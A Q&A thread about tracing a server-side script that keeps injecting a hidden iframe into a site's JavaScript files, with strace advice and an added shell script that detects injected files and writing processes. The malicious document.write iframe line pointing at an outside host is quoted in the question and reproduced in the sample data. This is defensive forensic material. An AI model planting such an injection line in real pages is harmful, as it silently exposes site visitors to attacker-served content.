Possible Duplicate:
My server’s been hacked EMERGENCY

A server of mine recently suffered a malware attack. I've since cleaned the server up a bit, upgraded a variety of WordPress installs and TimThumb files, and removed a lot of old and archived directories. My host (DreamHost) agrees that all the big wide open gaping vulnerabilities are closed.

Now I just need to find the source of the malware. Somewhere on my server, a script is adding an iframe injection to all my javascript files. It happens every few minutes. Here's an example of the injection, though this changes sometimes:

document.write('<iframe src="http://wbjsb.myddns.com/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');

If I remove this, it comes back in about 5 minutes.

Any thoughts on how to hunt down the script that is making these changes? Thanks!

PJ.
  • I watched the access logs to see if any external script was being called, but after cleaning the files, tailing the logs, and watching the files get corrupted again, nothing appeared on the access logs. – PJ. Dec 03 '12 at 17:29
  • You have backups, right? If you do, it will be much quicker and easier to do a complete re-install than to "clean" your server. – Ladadadada Dec 03 '12 at 17:48
  • @Ladadadada I do, but I'm not sure when the malware came in, so backing up might not remove the problem. I think I just figured it out, doing a tail of every log file and watching what is hit. WIP. – PJ. Dec 03 '12 at 17:53
  • Are there any files on your system with "wbjsb.myddns.com" in them? I realize sophisticated attackers obfuscate the strings, but it's worth trying. You can also limit the files to check to those that have been accessed since the last reboot. – mpez0 Dec 03 '12 at 18:55

1 Answer

If the malware is a script that is actually being executed by the web server, you could attempt to use strace to see what files are being opened and/or written to by the web server process/script interpreter based on system calls being made. It's a little low-level, but it works. (This depends on the server, scripting language, and forking model being used). You'd probably want to stick strace on the script interpreter (using php as an example, e.g. php5-fpm if it's PHP FPM, apache2 if using mod_php5) and could see what files are being opened, e.g. for apache2 with mod_php5:

sudo strace -f -e open,close,read,write apache2 -k start | tee /tmp/strace.log

or something to that effect, and examine the log. (-f forces strace to follow forks, assuming your Apache is using the prefork MPM, generally the default for mod_php5 installs; -e open restricts output to only the open(2) syscall and friends.) Obviously, this is going to show you every file that the server/PHP is opening, but you can do some grep magic to try and narrow it down.

You could probably narrow down based on the write(2) syscall that is occurring as well with grep (use the -v option to strace to avoid truncating the strings that are getting sent to write(2)).

blackbox222
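The two approaches on this page (grepping the site for the injected iframe string, as mpez0 suggests, and filtering strace output for writes to .js files, as the answer suggests) as one added POSIX shell example. This is illustrative code written for this page, not the poster's script or DreamHost tooling; the JavaScript files and the strace lines it works on are constructed samples (the sample paths, PIDs and file descriptors are made up), and the helper names are hypothetical.

```shell
#!/bin/sh
# Added example: locate injected JavaScript and work out which process writes it.
# Everything below is constructed sample data; nothing is from a real server.

WORKDIR=$(mktemp -d)
mkdir -p "$WORKDIR/js"

# Constructed sample: a JS file carrying the kind of injection the question shows.
cat > "$WORKDIR/js/app.js" <<'EOF'
function init() { console.log("hello"); }
document.write('<iframe src="http://wbjsb.myddns.com/valcunatrop.cgi?6" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');
EOF

# Constructed sample: an untouched JS file.
cat > "$WORKDIR/js/clean.js" <<'EOF'
function init() { console.log("hello"); }
EOF

# Constructed sample of 'strace -f' output (PIDs, paths and fds are invented).
# Modern glibc issues openat(2) rather than open(2), so both forms appear here.
cat > "$WORKDIR/strace.log" <<'EOF'
[pid  1234] open("/var/www/site/index.php", O_RDONLY) = 5
[pid  1235] openat(AT_FDCWD, "/var/www/site/js/app.js", O_WRONLY|O_TRUNC) = 7
[pid  1235] write(7, "document.write('<iframe src=\"http://wbjsb.myddns.com/"..., 140) = 140
[pid  1234] open("/var/www/site/js/clean.js", O_RDONLY) = 6
EOF

# List JS files under a directory that contain a document.write() of an <iframe>,
# the pattern used by the injection in the question.
find_injected_js() {
    find "$1" -name '*.js' -exec grep -lE 'document\.write\(.*<iframe' {} +
}

# List JS files modified within the last N minutes; run this right after cleaning
# so the next rewrite shows up with its exact mtime.
recently_modified_js() {
    find "$1" -name '*.js' -mmin "-$2"
}

# From an strace log, print open()/openat() calls on .js files that ask for write
# access (O_WRONLY or O_RDWR). Read-only opens by the web server are ignored.
js_write_opens() {
    grep -E 'open(at)?\((AT_FDCWD, )?"[^"]*\.js", [^)]*O_(WRONLY|RDWR)' "$1"
}

# Distinct PIDs that opened .js files for writing; feed these to ps/lsof to
# identify the interpreter and the script it is running.
js_writer_pids() {
    js_write_opens "$1" | sed -n 's/^\[pid *\([0-9]*\)\].*/\1/p' | sort -u
}

# Stand-alone run against the constructed samples.
echo "Injected files:"
find_injected_js "$WORKDIR"
echo "Writers:"
js_writer_pids "$WORKDIR/strace.log"
```

Two practical notes when running this against real strace output: strace truncates string arguments at 32 characters by default, so use the -s option (for example -s 256) if the write(2) payload needs to be readable, and trace openat as well as open, since current libc builds call openat.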